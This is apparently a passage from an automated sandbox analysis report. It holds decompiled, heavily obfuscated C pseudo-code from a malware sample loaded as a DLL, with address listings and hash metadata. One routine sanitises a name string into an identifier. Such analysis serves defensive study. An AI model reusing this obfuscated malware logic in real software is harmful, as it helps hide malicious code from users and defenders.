                                                                                                                                                                            				_v136 = _v136 ^ 0x01ffed69;
                                                                                                                                                                            				_v24 = 0x751c6a;
                                                                                                                                                                            				_t387 = 0x7d;
                                                                                                                                                                            				_v24 = _v24 / _t387;
                                                                                                                                                                            				_v24 = _v24 ^ 0x0002b143;
                                                                                                                                                                            				_v68 = 0x69a6e2;
                                                                                                                                                                            				_v68 = _v68 + 0xaa03;
                                                                                                                                                                            				_v68 = _v68 ^ 0x73662bb1;
                                                                                                                                                                            				_v68 = _v68 ^ 0x730f0150;
                                                                                                                                                                            				_v100 = 0xcb496d;
                                                                                                                                                                            				_v100 = _v100 >> 1;
                                                                                                                                                                            				_v100 = _v100 >> 0xf;
                                                                                                                                                                            				_v100 = _v100 ^ 0x0008f604;
                                                                                                                                                                            				_v56 = 0x2cd04e;
                                                                                                                                                                            				_v56 = _v56 << 3;
                                                                                                                                                                            				_v56 = _v56 ^ 0x0162f7e8;
                                                                                                                                                                            				_v32 = 0xb2ca4d;
                                                                                                                                                                            				_v32 = _v32 + 0x32b9;
                                                                                                                                                                            				_v32 = _v32 ^ 0x00b4bcfb;
                                                                                                                                                                            				_v64 = 0x655992;
                                                                                                                                                                            				_v64 = _v64 >> 5;
                                                                                                                                                                            				_v64 = _v64 | 0x6342cf71;
                                                                                                                                                                            				_v64 = _v64 ^ 0x634627b6;
                                                                                                                                                                            				_v116 = 0x833545;
                                                                                                                                                                            				_v116 = _v116 * 0x75;
                                                                                                                                                                            				_v116 = _v116 + 0xeb9e;
                                                                                                                                                                            				_v116 = _v116 * 0x6f;
                                                                                                                                                                            				_v116 = _v116 ^ 0x00ae15cd;
                                                                                                                                                                            				while(1) {
                                                                                                                                                                            					L1:
                                                                                                                                                                            					_t364 = 0x917a7c8;
                                                                                                                                                                            					do {
                                                                                                                                                                            						if(_t379 == 0x771143) {
                                                                                                                                                                            							_t379 = 0x6e440a7;
                                                                                                                                                                            							goto L9;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t379 == 0x1a710aa) {
                                                                                                                                                                            								E02F5F7FE(_v64, _v8, _v116, _v72);
                                                                                                                                                                            							} else {
                                                                                                                                                                            								if(_t379 == 0x6e440a7) {
                                                                                                                                                                            									_push(_v92);
                                                                                                                                                                            									_push(_v76);
                                                                                                                                                                            									_push(_v108);
                                                                                                                                                                            									_t367 = E02F6E1F8(0x2f514c8, _v120, __eflags);
                                                                                                                                                                            									_push(_v112);
                                                                                                                                                                            									_push(_v96);
                                                                                                                                                                            									_push(_v52);
                                                                                                                                                                            									__eflags = E02F5738A(_v156, _t367, _v164, _v44,  &_v8, E02F6E1F8(0x2f51318, _v144, __eflags), _v128) - _v148;
                                                                                                                                                                            									_t379 =  ==  ? 0x917a7c8 : 0x14ee4a5;
                                                                                                                                                                            									E02F6FECB(_t367, _v140, _v88, _v28, _v36);
                                                                                                                                                                            									E02F6FECB(_t368, _v80, _v124, _v132, _v20);
                                                                                                                                                                            									_t425 = _v4;
                                                                                                                                                                            									_t430 =  &(_t430[0x11]);
                                                                                                                                                                            									_t364 = 0x917a7c8;
                                                                                                                                                                            									goto L9;
                                                                                                                                                                            								} else {
                                                                                                                                                                            									_t436 = _t379 - _t364;
                                                                                                                                                                            									if(_t379 != _t364) {
                                                                                                                                                                            										goto L9;
                                                                                                                                                                            									} else {
                                                                                                                                                                            										_push(_v16);
                                                                                                                                                                            										_push(_v60);
                                                                                                                                                                            										_push(_v160);
                                                                                                                                                                            										_t375 = E02F6E1F8(0x2f51368, _v48, _t436);
                                                                                                                                                                            										_t420 =  *0x2f76224; // 0x0
                                                                                                                                                                            										E02F5BC32( *((intOrPtr*)(_t425 + 4)), _t420 + 0x48, _v152, _v104, _v12, _t375,  *_t425, _v40, _v136, _v8, 0x2f51368, _v24);
                                                                                                                                                                            										_t379 = 0x1a710aa;
                                                                                                                                                                            										_t429 =  ==  ? 1 : _t429;
                                                                                                                                                                            										E02F6FECB(_t375, _v68, _v100, _v56, _v32);
                                                                                                                                                                            										_t430 =  &(_t430[0x10]);
                                                                                                                                                                            										goto L1;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            						L12:
                                                                                                                                                                            						return _t429;
                                                                                                                                                                            						L9:
                                                                                                                                                                            						__eflags = _t379 - 0x14ee4a5;
                                                                                                                                                                            					} while (__eflags != 0);
                                                                                                                                                                            					goto L12;
                                                                                                                                                                            				}
                                                                                                                                                                            			}


























































                                                                                                                                                                            0x02f68fae
                                                                                                                                                                            0x02f68fb4
                                                                                                                                                                            0x02f68fbe
                                                                                                                                                                            0x02f68fc6
                                                                                                                                                                            0x02f68fce
                                                                                                                                                                            0x02f68fd6
                                                                                                                                                                            0x02f68fe6
                                                                                                                                                                            0x02f68fe8
                                                                                                                                                                            0x02f68fec
                                                                                                                                                                            0x02f68fef
                                                                                                                                                                            0x02f68ff6
                                                                                                                                                                            0x02f68ffb
                                                                                                                                                                            0x02f69004
                                                                                                                                                                            0x02f69008
                                                                                                                                                                            0x02f69010
                                                                                                                                                                            0x02f69018
                                                                                                                                                                            0x02f69025
                                                                                                                                                                            0x02f69029
                                                                                                                                                                            0x02f69031
                                                                                                                                                                            0x02f69039
                                                                                                                                                                            0x02f69041
                                                                                                                                                                            0x02f69049
                                                                                                                                                                            0x02f6904e
                                                                                                                                                                            0x02f69056
                                                                                                                                                                            0x02f6905e
                                                                                                                                                                            0x02f69066
                                                                                                                                                                            0x02f6906b
                                                                                                                                                                            0x02f69073
                                                                                                                                                                            0x02f6907b
                                                                                                                                                                            0x02f69083
                                                                                                                                                                            0x02f6908b
                                                                                                                                                                            0x02f69093
                                                                                                                                                                            0x02f6909b
                                                                                                                                                                            0x02f690a3
                                                                                                                                                                            0x02f690ab
                                                                                                                                                                            0x02f690b3
                                                                                                                                                                            0x02f690bb
                                                                                                                                                                            0x02f690c3
                                                                                                                                                                            0x02f690cb
                                                                                                                                                                            0x02f690d0
                                                                                                                                                                            0x02f690d8
                                                                                                                                                                            0x02f690e0
                                                                                                                                                                            0x02f690e8
                                                                                                                                                                            0x02f690f0
                                                                                                                                                                            0x02f690f8
                                                                                                                                                                            0x02f69100
                                                                                                                                                                            0x02f69105
                                                                                                                                                                            0x02f6910d
                                                                                                                                                                            0x02f69115
                                                                                                                                                                            0x02f6911d
                                                                                                                                                                            0x02f69128
                                                                                                                                                                            0x02f69130
                                                                                                                                                                            0x02f6913b
                                                                                                                                                                            0x02f69143
                                                                                                                                                                            0x02f6914b
                                                                                                                                                                            0x02f69153
                                                                                                                                                                            0x02f6915b
                                                                                                                                                                            0x02f69168
                                                                                                                                                                            0x02f6916c
                                                                                                                                                                            0x02f69171
                                                                                                                                                                            0x02f69179
                                                                                                                                                                            0x02f69181
                                                                                                                                                                            0x02f69189
                                                                                                                                                                            0x02f6918e
                                                                                                                                                                            0x02f69196
                                                                                                                                                                            0x02f6919e
                                                                                                                                                                            0x02f691a6
                                                                                                                                                                            0x02f691ab
                                                                                                                                                                            0x02f691b8
                                                                                                                                                                            0x02f691bc
                                                                                                                                                                            0x02f691c4
                                                                                                                                                                            0x02f691ce
                                                                                                                                                                            0x02f691d4
                                                                                                                                                                            0x02f691d9
                                                                                                                                                                            0x02f691df
                                                                                                                                                                            0x02f691e7
                                                                                                                                                                            0x02f691ef
                                                                                                                                                                            0x02f691f7
                                                                                                                                                                            0x02f691ff
                                                                                                                                                                            0x02f6920b
                                                                                                                                                                            0x02f69210
                                                                                                                                                                            0x02f6921a
                                                                                                                                                                            0x02f6921f
                                                                                                                                                                            0x02f69225
                                                                                                                                                                            0x02f6922d
                                                                                                                                                                            0x02f69235
                                                                                                                                                                            0x02f6923d
                                                                                                                                                                            0x02f69242
                                                                                                                                                                            0x02f6924a
                                                                                                                                                                            0x02f69255
                                                                                                                                                                            0x02f69260
                                                                                                                                                                            0x02f6926b
                                                                                                                                                                            0x02f69276
                                                                                                                                                                            0x02f69281
                                                                                                                                                                            0x02f6928c
                                                                                                                                                                            0x02f69294
                                                                                                                                                                            0x02f692a0
                                                                                                                                                                            0x02f692a3
                                                                                                                                                                            0x02f692a7
                                                                                                                                                                            0x02f692af
                                                                                                                                                                            0x02f692b7
                                                                                                                                                                            0x02f692bc
                                                                                                                                                                            0x02f692c1
                                                                                                                                                                            0x02f692c6
                                                                                                                                                                            0x02f692ce
                                                                                                                                                                            0x02f692d6
                                                                                                                                                                            0x02f692de
                                                                                                                                                                            0x02f692e3
                                                                                                                                                                            0x02f692e8
                                                                                                                                                                            0x02f692f0
                                                                                                                                                                            0x02f692fb
                                                                                                                                                                            0x02f69306
                                                                                                                                                                            0x02f69311
                                                                                                                                                                            0x02f6931c
                                                                                                                                                                            0x02f69327
                                                                                                                                                                            0x02f69332
                                                                                                                                                                            0x02f6933f
                                                                                                                                                                            0x02f69343
                                                                                                                                                                            0x02f6934b
                                                                                                                                                                            0x02f69350
                                                                                                                                                                            0x02f69358
                                                                                                                                                                            0x02f69360
                                                                                                                                                                            0x02f69365
                                                                                                                                                                            0x02f6936d
                                                                                                                                                                            0x02f69378
                                                                                                                                                                            0x02f69380
                                                                                                                                                                            0x02f6938b
                                                                                                                                                                            0x02f69393
                                                                                                                                                                            0x02f6939b
                                                                                                                                                                            0x02f693a0
                                                                                                                                                                            0x02f693a8
                                                                                                                                                                            0x02f693b3
                                                                                                                                                                            0x02f693be
                                                                                                                                                                            0x02f693c9
                                                                                                                                                                            0x02f693dc
                                                                                                                                                                            0x02f693e5
                                                                                                                                                                            0x02f693f0
                                                                                                                                                                            0x02f693f8
                                                                                                                                                                            0x02f693fc
                                                                                                                                                                            0x02f69404
                                                                                                                                                                            0x02f6940c
                                                                                                                                                                            0x02f69414
                                                                                                                                                                            0x02f69428
                                                                                                                                                                            0x02f6942b
                                                                                                                                                                            0x02f69432
                                                                                                                                                                            0x02f6943d
                                                                                                                                                                            0x02f69445
                                                                                                                                                                            0x02f6944d
                                                                                                                                                                            0x02f69455
                                                                                                                                                                            0x02f6945d
                                                                                                                                                                            0x02f69465
                                                                                                                                                                            0x02f69469
                                                                                                                                                                            0x02f6946e
                                                                                                                                                                            0x02f69476
                                                                                                                                                                            0x02f6947e
                                                                                                                                                                            0x02f69483
                                                                                                                                                                            0x02f6948b
                                                                                                                                                                            0x02f69496
                                                                                                                                                                            0x02f694a1
                                                                                                                                                                            0x02f694ac
                                                                                                                                                                            0x02f694b4
                                                                                                                                                                            0x02f694b9
                                                                                                                                                                            0x02f694c1
                                                                                                                                                                            0x02f694c9
                                                                                                                                                                            0x02f694d6
                                                                                                                                                                            0x02f694da
                                                                                                                                                                            0x02f694e7
                                                                                                                                                                            0x02f694eb
                                                                                                                                                                            0x02f694f3
                                                                                                                                                                            0x02f694f3
                                                                                                                                                                            0x02f694f3
                                                                                                                                                                            0x02f694f8
                                                                                                                                                                            0x02f694fe
                                                                                                                                                                            0x02f69688
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69504
                                                                                                                                                                            0x02f6950a
                                                                                                                                                                            0x02f696ae
                                                                                                                                                                            0x02f69510
                                                                                                                                                                            0x02f69516
                                                                                                                                                                            0x02f695c7
                                                                                                                                                                            0x02f695d0
                                                                                                                                                                            0x02f695d4
                                                                                                                                                                            0x02f695dc
                                                                                                                                                                            0x02f695e1
                                                                                                                                                                            0x02f695ec
                                                                                                                                                                            0x02f695f0
                                                                                                                                                                            0x02f69630
                                                                                                                                                                            0x02f69647
                                                                                                                                                                            0x02f69655
                                                                                                                                                                            0x02f69672
                                                                                                                                                                            0x02f69677
                                                                                                                                                                            0x02f6967e
                                                                                                                                                                            0x02f69681
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6951c
                                                                                                                                                                            0x02f6951c
                                                                                                                                                                            0x02f6951e
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69524
                                                                                                                                                                            0x02f69524
                                                                                                                                                                            0x02f69530
                                                                                                                                                                            0x02f69534
                                                                                                                                                                            0x02f6953f
                                                                                                                                                                            0x02f69575
                                                                                                                                                                            0x02f69581
                                                                                                                                                                            0x02f6959b
                                                                                                                                                                            0x02f695a7
                                                                                                                                                                            0x02f695ba
                                                                                                                                                                            0x02f695bf
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f695bf
                                                                                                                                                                            0x02f6951e
                                                                                                                                                                            0x02f69516
                                                                                                                                                                            0x02f6950a
                                                                                                                                                                            0x02f696b7
                                                                                                                                                                            0x02f696c1
                                                                                                                                                                            0x02f6968d
                                                                                                                                                                            0x02f6968d
                                                                                                                                                                            0x02f6968d
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f69699

                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.315379294.0000000002F51000.00000020.00000001.sdmp, Offset: 02F50000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.315370225.0000000002F50000.00000004.00000001.sdmp Download File
                                                                                                                                                                            • Associated: 00000000.00000002.315401367.0000000002F76000.00000004.00000001.sdmp Download File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2f50000_loaddll32.jbxd
                                                                                                                                                                            Yara matches
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: <S$tU$zPB
                                                                                                                                                                            • API String ID: 0-3909742637
                                                                                                                                                                            • Opcode ID: 4175af3e31055eddd72cb6794f9953c631a0ba49439fc58f8e53fa755141306d
                                                                                                                                                                            • Instruction ID: a4f5d11708af07421583b1310de717ba58a8712de4e4e67001cdae6dd588d411
                                                                                                                                                                            • Opcode Fuzzy Hash: 4175af3e31055eddd72cb6794f9953c631a0ba49439fc58f8e53fa755141306d
                                                                                                                                                                            • Instruction Fuzzy Hash: 05F100715083809FD768CF21C98AA4BFBF2FBC5758F10891DE69A96260D7B18909CF43
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                                            			E02F69DF5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                                                            				char _v128;
                                                                                                                                                                            				char _v132;
                                                                                                                                                                            				signed int _v136;
                                                                                                                                                                            				signed int _v140;
                                                                                                                                                                            				signed int _v144;
                                                                                                                                                                            				unsigned int _v148;
                                                                                                                                                                            				signed int _v152;
                                                                                                                                                                            				signed int _v156;
                                                                                                                                                                            				signed int _v160;
                                                                                                                                                                            				signed int _v164;
                                                                                                                                                                            				signed int _v168;
                                                                                                                                                                            				signed int _v172;
                                                                                                                                                                            				signed int _v176;
                                                                                                                                                                            				signed int _v180;
                                                                                                                                                                            				signed int _v184;
                                                                                                                                                                            				signed int _v188;
                                                                                                                                                                            				signed int _v192;
                                                                                                                                                                            				signed int _v196;
                                                                                                                                                                            				signed int _v200;
                                                                                                                                                                            				signed int _v204;
                                                                                                                                                                            				signed int _v208;
                                                                                                                                                                            				void* _t196;
                                                                                                                                                                            				void* _t219;
                                                                                                                                                                            				char _t222;
                                                                                                                                                                            				void* _t227;
                                                                                                                                                                            				char* _t235;
                                                                                                                                                                            				void* _t259;
                                                                                                                                                                            				signed int _t260;
                                                                                                                                                                            				signed int _t261;
                                                                                                                                                                            				signed int _t262;
                                                                                                                                                                            				signed int _t263;
                                                                                                                                                                            				signed int _t264;
                                                                                                                                                                            				signed int _t265;
                                                                                                                                                                            				signed int _t266;
                                                                                                                                                                            				signed int _t267;
                                                                                                                                                                            				signed int _t268;
                                                                                                                                                                            				signed int* _t272;
                                                                                                                                                                            
                                                                                                                                                                            				_push(_a12);
                                                                                                                                                                            				_t259 = __ecx;
                                                                                                                                                                            				_push(_a8);
                                                                                                                                                                            				_push(_a4);
                                                                                                                                                                            				_push(__edx);
                                                                                                                                                                            				_push(__ecx);
                                                                                                                                                                            				E02F6FE29(_t196);
                                                                                                                                                                            				_v164 = 0xe41f8c;
                                                                                                                                                                            				_t272 =  &(( &_v208)[5]);
                                                                                                                                                                            				_v164 = _v164 << 0x10;
                                                                                                                                                                            				_t227 = 0xb5c0777;
                                                                                                                                                                            				_t260 = 0x69;
                                                                                                                                                                            				_v164 = _v164 * 0x11;
                                                                                                                                                                            				_v164 = _v164 ^ 0x18467706;
                                                                                                                                                                            				_v180 = 0xeb334b;
                                                                                                                                                                            				_v180 = _v180 ^ 0xb42ec71e;
                                                                                                                                                                            				_v180 = _v180 << 0xf;
                                                                                                                                                                            				_v180 = _v180 ^ 0xfa2f170d;
                                                                                                                                                                            				_v204 = 0x9173d0;
                                                                                                                                                                            				_v204 = _v204 / _t260;
                                                                                                                                                                            				_v204 = _v204 + 0xc6b3;
                                                                                                                                                                            				_t261 = 0x22;
                                                                                                                                                                            				_v204 = _v204 / _t261;
                                                                                                                                                                            				_v204 = _v204 ^ 0x000ee5cc;
                                                                                                                                                                            				_v176 = 0x7c8d5;
                                                                                                                                                                            				_v176 = _v176 | 0x723fe192;
                                                                                                                                                                            				_v176 = _v176 + 0x4897;
                                                                                                                                                                            				_v176 = _v176 ^ 0x724c9210;
                                                                                                                                                                            				_v184 = 0xa283a5;
                                                                                                                                                                            				_v184 = _v184 >> 0xd;
                                                                                                                                                                            				_v184 = _v184 >> 9;
                                                                                                                                                                            				_v184 = _v184 ^ 0x00039d39;
                                                                                                                                                                            				_v172 = 0xfcf8f5;
                                                                                                                                                                            				_t262 = 0x68;
                                                                                                                                                                            				_v172 = _v172 / _t262;
                                                                                                                                                                            				_t263 = 0x12;
                                                                                                                                                                            				_v172 = _v172 / _t263;
                                                                                                                                                                            				_v172 = _v172 ^ 0x0008ec4c;
                                                                                                                                                                            				_v196 = 0x6ce5d4;
                                                                                                                                                                            				_v196 = _v196 + 0x3b25;
                                                                                                                                                                            				_v196 = _v196 ^ 0x77f3da3b;
                                                                                                                                                                            				_v196 = _v196 + 0xa9d5;
                                                                                                                                                                            				_v196 = _v196 ^ 0x779af0ad;
                                                                                                                                                                            				_v156 = 0x25f26f;
                                                                                                                                                                            				_t264 = 0x4f;
                                                                                                                                                                            				_v156 = _v156 / _t264;
                                                                                                                                                                            				_v156 = _v156 ^ 0x000ca3cb;
                                                                                                                                                                            				_v188 = 0x55ff28;
                                                                                                                                                                            				_t265 = 7;
                                                                                                                                                                            				_v188 = _v188 / _t265;
                                                                                                                                                                            				_t266 = 0x50;
                                                                                                                                                                            				_v188 = _v188 / _t266;
                                                                                                                                                                            				_v188 = _v188 ^ 0x000cd773;
                                                                                                                                                                            				_v148 = 0x9faf35;
                                                                                                                                                                            				_v148 = _v148 >> 0xb;
                                                                                                                                                                            				_v148 = _v148 ^ 0x00041a0d;
                                                                                                                                                                            				_v144 = 0xb9aa79;
                                                                                                                                                                            				_v144 = _v144 + 0xffff300b;
                                                                                                                                                                            				_v144 = _v144 ^ 0x00b65e72;
                                                                                                                                                                            				_v152 = 0xe2e022;
                                                                                                                                                                            				_v152 = _v152 << 0xa;
                                                                                                                                                                            				_v152 = _v152 ^ 0x8b87efd2;
                                                                                                                                                                            				_v140 = 0x6f845f;
                                                                                                                                                                            				_v140 = _v140 ^ 0xc6ebfb93;
                                                                                                                                                                            				_v140 = _v140 ^ 0xc684fc76;
                                                                                                                                                                            				_v208 = 0x15bd2c;
                                                                                                                                                                            				_v208 = _v208 + 0xca24;
                                                                                                                                                                            				_v208 = _v208 + 0xaf45;
                                                                                                                                                                            				_v208 = _v208 >> 5;
                                                                                                                                                                            				_v208 = _v208 ^ 0x000727e8;
                                                                                                                                                                            				_v136 = 0x982476;
                                                                                                                                                                            				_v136 = _v136 | 0xd92aa943;
                                                                                                                                                                            				_v136 = _v136 ^ 0xd9b01548;
                                                                                                                                                                            				_v160 = 0x20104f;
                                                                                                                                                                            				_v160 = _v160 ^ 0xef20d220;
                                                                                                                                                                            				_t267 = 0x2e;
                                                                                                                                                                            				_v160 = _v160 * 0x21;
                                                                                                                                                                            				_v160 = _v160 ^ 0xcf1410de;
                                                                                                                                                                            				_v168 = 0x2e9b6b;
                                                                                                                                                                            				_v168 = _v168 + 0xffff5c1c;
                                                                                                                                                                            				_v168 = _v168 * 0x26;
                                                                                                                                                                            				_v168 = _v168 ^ 0x06dc91dd;
                                                                                                                                                                            				_v192 = 0xd01025;
                                                                                                                                                                            				_v192 = _v192 | 0x8f03462b;
                                                                                                                                                                            				_v192 = _v192 + 0xffffdaa2;
                                                                                                                                                                            				_v192 = _v192 << 2;
                                                                                                                                                                            				_v192 = _v192 ^ 0x3f4450ba;
                                                                                                                                                                            				_v200 = 0xfd9656;
                                                                                                                                                                            				_v200 = _v200 | 0x00ba0155;
                                                                                                                                                                            				_v200 = _v200 / _t267;
                                                                                                                                                                            				_t268 = 0x6a;
                                                                                                                                                                            				_v200 = _v200 / _t268;
                                                                                                                                                                            				_v200 = _v200 ^ 0x00073cbf;
                                                                                                                                                                            				while(_t227 != 0x9fc41a2) {
                                                                                                                                                                            					if(_t227 == 0xa1171ea) {
                                                                                                                                                                            						_v132 = 0x80;
                                                                                                                                                                            						_t222 = E02F696C2(_v164, _v180, _v204, _v176,  &_v128,  &_v132);
                                                                                                                                                                            						_t272 =  &(_t272[4]);
                                                                                                                                                                            						_t227 = 0xabd7dae;
                                                                                                                                                                            						continue;
                                                                                                                                                                            					} else {
                                                                                                                                                                            						if(_t227 == 0xabd7dae) {
                                                                                                                                                                            							__eflags = _v128;
                                                                                                                                                                            							_t235 =  &_v128;
                                                                                                                                                                            							while(__eflags != 0) {
                                                                                                                                                                            								_t222 =  *_t235;
                                                                                                                                                                            								__eflags = _t222 - 0x30;
                                                                                                                                                                            								if(_t222 < 0x30) {
                                                                                                                                                                            									L9:
                                                                                                                                                                            									__eflags = _t222 - 0x61;
                                                                                                                                                                            									if(_t222 < 0x61) {
                                                                                                                                                                            										L11:
                                                                                                                                                                            										__eflags = _t222 - 0x41;
                                                                                                                                                                            										if(_t222 < 0x41) {
                                                                                                                                                                            											L13:
                                                                                                                                                                            											 *_t235 = 0x58;
                                                                                                                                                                            										} else {
                                                                                                                                                                            											__eflags = _t222 - 0x5a;
                                                                                                                                                                            											if(_t222 > 0x5a) {
                                                                                                                                                                            												goto L13;
                                                                                                                                                                            											}
                                                                                                                                                                            										}
                                                                                                                                                                            									} else {
                                                                                                                                                                            										__eflags = _t222 - 0x7a;
                                                                                                                                                                            										if(_t222 > 0x7a) {
                                                                                                                                                                            											goto L11;
                                                                                                                                                                            										}
                                                                                                                                                                            									}
                                                                                                                                                                            								} else {
                                                                                                                                                                            									__eflags = _t222 - 0x39;
                                                                                                                                                                            									if(_t222 > 0x39) {
                                                                                                                                                                            										goto L9;
                                                                                                                                                                            									}
                                                                                                                                                                            								}
                                                                                                                                                                            								_t235 = _t235 + 1;
                                                                                                                                                                            								__eflags =  *_t235;
                                                                                                                                                                            							}
                                                                                                                                                                            							_t227 = 0x9fc41a2;
                                                                                                                                                                            							continue;
                                                                                                                                                                            						} else {
                                                                                                                                                                            							if(_t227 == 0xb5c0777) {
                                                                                                                                                                            								_t227 = 0xa1171ea;
                                                                                                                                                                            								continue;
                                                                                                                                                                            							}
                                                                                                                                                                            						}
                                                                                                                                                                            					}
                                                                                                                                                                            					L18:
                                                                                                                                                                            					__eflags = _t227 - 0x108096a;
                                                                                                                                                                            					if(__eflags != 0) {
                                                                                                                                                                            						continue;
                                                                                                                                                                            					}
                                                                                                                                                                            					return _t222;
                                                                                                                                                                            				}
                                                                                                                                                                            				_push(_v156);
                                                                                                                                                                            				_push(_v196);
                                                                                                                                                                            				_push(0x2f5119c);
                                                                                                                                                                            				_t219 = E02F64244(_v184, _v172, __eflags);
                                                                                                                                                                            				E02F70A1A(E02F65515(__eflags), __eflags, _t219, _v152,  &_v128, _v188, _t259, _v140, _v208, _v136);
                                                                                                                                                                            				_t222 = E02F6FECB(_t219, _v160, _v168, _v192, _v200);
                                                                                                                                                                            				_t272 =  &(_t272[0xe]);
                                                                                                                                                                            				_t227 = 0x108096a;
                                                                                                                                                                            				goto L18;
                                                                                                                                                                            			}








































                                                                                                                                                                            0x02f69dff
                                                                                                                                                                            0x02f69e06
                                                                                                                                                                            0x02f69e08
                                                                                                                                                                            0x02f69e0f
                                                                                                                                                                            0x02f69e16
                                                                                                                                                                            0x02f69e17
                                                                                                                                                                            0x02f69e18
                                                                                                                                                                            0x02f69e1d
                                                                                                                                                                            0x02f69e25
                                                                                                                                                                            0x02f69e28
                                                                                                                                                                            0x02f69e34
                                                                                                                                                                            0x02f69e3b
                                                                                                                                                                            0x02f69e3e
                                                                                                                                                                            0x02f69e42
                                                                                                                                                                            0x02f69e4a
                                                                                                                                                                            0x02f69e52
                                                                                                                                                                            0x02f69e5a
                                                                                                                                                                            0x02f69e5f
                                                                                                                                                                            0x02f69e67
                                                                                                                                                                            0x02f69e77
                                                                                                                                                                            0x02f69e7b
                                                                                                                                                                            0x02f69e87
                                                                                                                                                                            0x02f69e8c
                                                                                                                                                                            0x02f69e92
                                                                                                                                                                            0x02f69e9a
                                                                                                                                                                            0x02f69ea2
                                                                                                                                                                            0x02f69eaa
                                                                                                                                                                            0x02f69eb2
                                                                                                                                                                            0x02f69eba
                                                                                                                                                                            0x02f69ec2
                                                                                                                                                                            0x02f69ec7
                                                                                                                                                                            0x02f69ecc
                                                                                                                                                                            0x02f69ed4
                                                                                                                                                                            0x02f69ee0
                                                                                                                                                                            0x02f69ee5
                                                                                                                                                                            0x02f69eef
                                                                                                                                                                            0x02f69ef4
                                                                                                                                                                            0x02f69efa
                                                                                                                                                                            0x02f69f02
                                                                                                                                                                            0x02f69f0a
                                                                                                                                                                            0x02f69f12
                                                                                                                                                                            0x02f69f1a
                                                                                                                                                                            0x02f69f22
                                                                                                                                                                            0x02f69f2a
                                                                                                                                                                            0x02f69f36
                                                                                                                                                                            0x02f69f3b
                                                                                                                                                                            0x02f69f41
                                                                                                                                                                            0x02f69f49
                                                                                                                                                                            0x02f69f55
                                                                                                                                                                            0x02f69f5a
                                                                                                                                                                            0x02f69f64
                                                                                                                                                                            0x02f69f69
                                                                                                                                                                            0x02f69f6f
                                                                                                                                                                            0x02f69f7c
                                                                                                                                                                            0x02f69f89
                                                                                                                                                                            0x02f69f8e
                                                                                                                                                                            0x02f69f96
                                                                                                                                                                            0x02f69f9e
                                                                                                                                                                            0x02f69fa6
                                                                                                                                                                            0x02f69fae
                                                                                                                                                                            0x02f69fb6
                                                                                                                                                                            0x02f69fbb
                                                                                                                                                                            0x02f69fc3
                                                                                                                                                                            0x02f69fcb
                                                                                                                                                                            0x02f69fd3
                                                                                                                                                                            0x02f69fdb
                                                                                                                                                                            0x02f69fe3
                                                                                                                                                                            0x02f69feb
                                                                                                                                                                            0x02f69ff3
                                                                                                                                                                            0x02f69ff8
                                                                                                                                                                            0x02f6a000
                                                                                                                                                                            0x02f6a008
                                                                                                                                                                            0x02f6a010
                                                                                                                                                                            0x02f6a018
                                                                                                                                                                            0x02f6a020
                                                                                                                                                                            0x02f6a02d
                                                                                                                                                                            0x02f6a030
                                                                                                                                                                            0x02f6a034
                                                                                                                                                                            0x02f6a03c
                                                                                                                                                                            0x02f6a044
                                                                                                                                                                            0x02f6a051
                                                                                                                                                                            0x02f6a055
                                                                                                                                                                            0x02f6a05d
                                                                                                                                                                            0x02f6a065
                                                                                                                                                                            0x02f6a06d
                                                                                                                                                                            0x02f6a075
                                                                                                                                                                            0x02f6a07a
                                                                                                                                                                            0x02f6a082
                                                                                                                                                                            0x02f6a08a
                                                                                                                                                                            0x02f6a09a
                                                                                                                                                                            0x02f6a0a2
                                                                                                                                                                            0x02f6a0a5
                                                                                                                                                                            0x02f6a0a9
                                                                                                                                                                            0x02f6a0b1
                                                                                                                                                                            0x02f6a0bb
                                                                                                                                                                            0x02f6a10b
                                                                                                                                                                            0x02f6a129
                                                                                                                                                                            0x02f6a12e
                                                                                                                                                                            0x02f6a131
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6a0bd
                                                                                                                                                                            0x02f6a0c3
                                                                                                                                                                            0x02f6a0d5
                                                                                                                                                                            0x02f6a0da
                                                                                                                                                                            0x02f6a0de
                                                                                                                                                                            0x02f6a0e0
                                                                                                                                                                            0x02f6a0e2
                                                                                                                                                                            0x02f6a0e4
                                                                                                                                                                            0x02f6a0ea
                                                                                                                                                                            0x02f6a0ea
                                                                                                                                                                            0x02f6a0ec
                                                                                                                                                                            0x02f6a0f2
                                                                                                                                                                            0x02f6a0f2
                                                                                                                                                                            0x02f6a0f4
                                                                                                                                                                            0x02f6a0fa
                                                                                                                                                                            0x02f6a0fa
                                                                                                                                                                            0x02f6a0f6
                                                                                                                                                                            0x02f6a0f6
                                                                                                                                                                            0x02f6a0f8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6a0f8
                                                                                                                                                                            0x02f6a0ee
                                                                                                                                                                            0x02f6a0ee
                                                                                                                                                                            0x02f6a0f0
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6a0f0
                                                                                                                                                                            0x02f6a0e6
                                                                                                                                                                            0x02f6a0e6
                                                                                                                                                                            0x02f6a0e8
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6a0e8
                                                                                                                                                                            0x02f6a0fd
                                                                                                                                                                            0x02f6a0fe
                                                                                                                                                                            0x02f6a0fe
                                                                                                                                                                            0x02f6a103
                                                                                                                                                                            0x00000000
                                                                                                                                                                            0x02f6a0c5
                                                                                                                                                                            0x02f6a0cb
                                                                                                                                                                            0x02f6a0d1
